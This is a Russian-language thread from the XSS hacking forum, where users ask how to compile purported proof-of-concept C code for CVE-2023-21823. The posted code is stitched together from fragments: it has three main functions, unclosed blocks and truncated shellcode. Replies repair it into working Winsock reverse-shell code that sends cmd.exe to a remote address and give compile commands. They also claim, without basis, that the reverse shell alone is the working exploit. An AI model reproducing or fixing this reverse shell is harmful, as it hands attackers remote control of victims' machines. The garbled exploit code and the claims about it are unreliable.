• XSS.stack #1 – первый литературный журнал от юзеров форума

Как скомпилить CVE-2023-21823 PoC in C

hahbah

Кодер C/C++
Пользователь
Регистрация
29.10.2021
Сообщения
148
Реакции
63
Гарант сделки
7
Есть такая cve - https://github.com/Elizarfish/CVE-2023-21823
Вот код:

C:
#include <windows.h>
#include <winsock2.h>
#include <stdio.h>
#include <ws2tcpip.h>
#pragma comment(lib,"ws2_32")

int main() {
    HBITMAP hBitmap;
    HDC hdcMem;
    LPVOID pvScan0;
    BITMAPINFO bmi = { sizeof(BITMAPINFOHEADER), 0, 0, 1, 32, BI_RGB };
    BYTE bJmp[6] = { 0xEB, 0x06, 0x90, 0x90, 0x90, 0x90 };

    hBitmap = CreateBitmap(1, 1, 1, 32, NULL);
    hdcMem = CreateCompatibleDC(NULL);
    SelectObject(hdcMem, hBitmap);
    GetDIBits(hdcMem, hBitmap, 0, 0, NULL, &bmi, DIB_RGB_COLORS);
    pvScan0 = VirtualAlloc(NULL, bmi.bmiHeader.biSizeImage, MEM_COMMIT, PAGE_READWRITE);
    bmi.bmiHeader.biCompression = BI_JPEG;
    memcpy((PBYTE)pvScan0 + bmi.bmiHeader.biSizeImage - 6, bJmp, 6);
    SetDIBits(hdcMem, hBitmap, 0, 1, pvScan0, &bmi, DIB_RGB_COLORS);
    
int main(int argc, char** argv)
{
    WSADATA wsaData;
    SOCKET s;
    SOCKADDR_IN server;
    STARTUPINFO sInfo;
    PROCESS_INFORMATION pInfo;

    // Reverse shell payload
    char* shellcode = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5\x49\xbc\x02\x00\x1f\x90\xc0\xa8\x00\x66\x41\x54\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x6a\x02\x59\x50\x50\x4d\x31\xc9\x

int main()
{
    // Setup reverse shell payload
    WSADATA wsaData;
    SOCKET Winsock;
    sockaddr_in addr;
    STARTUPINFOA sInfo;
    PROCESS_INFORMATION pInfo;

    WSAStartup(MAKEWORD(2, 2), &wsaData);

    Winsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, NULL, NULL);
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = inet_addr("192.168.0.1"); // Your IP address here
    addr.sin_port = htons(1234); // Your listening port here

    WSAConnect(Winsock, (SOCKADDR*)&addr, sizeof(addr), NULL, NULL, NULL, NULL);

    memset(&sInfo, 0, sizeof(sInfo));
    sInfo.cb = sizeof(sInfo);
    sInfo.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW);
    sInfo.hStdInput = sInfo.hStdOutput = sInfo.hStdError = (HANDLE)Winsock;

    char* szCmdline = "cmd.exe"; // Command line to execute

    CreateProcessA(NULL, szCmdline, NULL, NULL, TRUE, 0, NULL, NULL, &sInfo, &pInfo);

    return 0;
}

Тут 3 точки входа, не закрыты блоки и переменная.
Может кто-то знает как это скомпилировать?
 
В коде, который ты прислал, есть несколько проблем, которые нужно исправить перед компиляцией. Во-первых, у тебя есть несколько функций main, что недопустимо. Нужно оставить только одну функцию main, а все остальные удалить или интегрировать в неё. Во-вторых, в коде отсутствуют закрывающие фигурные скобки для некоторых блоков.

Вот упрощённый пример того, как это можно исправить:

Код:
#include <windows.h>
#include <winsock2.h>
#include <stdio.h>
#include <ws2tcpip.h>
#pragma comment(lib,"ws2_32")

int main() {
    WSADATA wsaData;
    SOCKET s;
    SOCKADDR_IN server;
    STARTUPINFO sInfo;
    PROCESS_INFORMATION pInfo;

    // Инициализация Winsock
    WSAStartup(MAKEWORD(2, 2), &wsaData);

    // Настройка сокета и подключение
    s = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, NULL, NULL);
    server.sin_family = AF_INET;
    server.sin_addr.s_addr = inet_addr("192.168.0.1"); // Ваш IP здесь
    server.sin_port = htons(1234); // Ваш порт здесь

    WSAConnect(s, (SOCKADDR*)&server, sizeof(server), NULL, NULL, NULL, NULL);

    // Настройка параметров запуска процесса
    memset(&sInfo, 0, sizeof(sInfo));
    sInfo.cb = sizeof(sInfo);
    sInfo.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW);
    sInfo.hStdInput = sInfo.hStdOutput = sInfo.hStdError = (HANDLE)s;

    // Запуск командной строки
    CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &sInfo, &pInfo);

    return 0;
}

Вот как можно скомпилировать код:
  • Открой Visual Studio и создай новый проект "Консольное приложение" на C++.
  • Вставь исправленный код в основной файл исходного кода (например, main.cpp).
  • Нажми Build (Сборка) или Compile (Компиляция), чтобы создать исполняемый файл


Или через командную строку:

  • Открой командную строку разработчика (Developer Command Prompt).
  • Перейди в папку с твоим файлом с кодом.
  • Введи эту команду:
Код:
cl /EHsc /link ws2_32.lib main.cpp

Это скомпилирует твой код и создаст исполняемый файл main.exe.
Спасибо. Я и сам могу скомпилировать все.
Тут больше вопрос. Почему тут 3 точки входа. И если взять только последнюю сработает ли эксплоит?
И что делают остальные 2
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Три точки входа здесь появились из-за того, что код составлен из разных частей, каждая из которых может быть отдельной частью эксперимента или разных сценариев эксплуатации уязвимости. Последняя точка входа, как ты заметил, основная — она запускает обратный shell и в принципе должна сработать, если убрать остальные. Что делают остальные две — вероятно, они остались от попыток модификации других частей эксплоита, но для основной задачи они не нужны.
Спасибо. Я и сам могу скомпилировать все.
Тут больше вопрос. Почему тут 3 точки входа. И если взять только последнюю сработает ли эксплоит?
И что делают остальные 2
 
Три точки входа здесь появились из-за того, что код составлен из разных частей, каждая из которых может быть отдельной частью эксперимента или разных сценариев эксплуатации уязвимости. Последняя точка входа, как ты заметил, основная — она запускает обратный shell и в принципе должна сработать, если убрать остальные. Что делают остальные две — вероятно, они остались от попыток модификации других частей эксплоита, но для основной задачи они не нужны.
Большое спасибо
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх